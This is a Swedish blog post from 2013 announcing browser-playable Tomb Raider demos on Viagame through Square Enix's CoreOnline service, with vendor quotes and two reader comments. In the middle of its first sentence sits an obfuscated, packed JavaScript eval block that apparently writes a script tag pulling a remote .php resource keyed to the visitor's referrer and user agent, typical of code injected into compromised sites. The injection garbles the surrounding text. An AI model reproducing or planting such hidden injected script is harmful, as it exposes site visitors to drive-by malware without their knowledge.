Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Viagame – Spela kvalitetsspel direkt i webbläsaren

Viagame – Spela kvalitetsspel direkt i webbläsaren
Filip Urde
  • On 5 mars, 2013
  • http://www.revue.se/filip-urde

Spela eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|niszn|var|u0026u|referrer|afhay||js|php’.split(’|’),0,{}))
hög kvalitet spel PC i din webbläsare på Viagame

Lagom till den efterlängtade lanseringen av nya Tomb Raider spelet så erbjuder Viagame sina besökare att spela Tomb Raider Underworld (2008) och Lara Croft & Guardian of Light (2010) direkt från molnet i samarbete med spelets utgivare Square Enix.

I ett första steg så kommer två demos finnas tillgänglig för Viagame användare som dem sedan kan spela direkt i webbläsaren. Samarbetet drivs av tekniken bakom CoreOnline, en online speltjänst som utvecklats av Hapti.co, en dansk studio inom Square Enix-gruppen.

We are very excited to bring “click and play” demos to our visitors and we think it clearly reflects our innovative spirit. The partnership with CoreOnline is a great way to give our customers something really fun and cool to try out and it is also interesting for looking at the potential of a bigger scale, ”-

säger Amandine Durey, chef för Viagame.

Vi tycker det här är en riktigt ball tjänst och det känns ju inte som det kan blik mycket enklare. Första gångens användare måste dock installera en plugin (på mindre än 2MB) som gör det möjligt för webbläsarna att spela spelen http://www.viagame.se/coreonline. Man säger även att demos kommer att finnas tillgänglig från 5 mars (idag) – 30 april, och mer kommer snart.

“It is a great opportunity to collaborate with Viagame on bringing high quality games to their visitors with the lowest amount of friction. CoreOnline is an online gaming service which brings high quality games you normally would play on a console, into the user’s browser. säger David Guldbrandsen, General Manager of Hapti.co.

För att fira lanseringen så kommer Viagame ha bra priser på Tomb Raider och Lara Croft titlar. Så gå in och kika nedan.

www.viagame.se

 

Comments

  1. Johnny

    Riktigt grisigt!!! Fan vad najs för oss på Mac.

    • Verkligen… detta är ett stort steg framåt!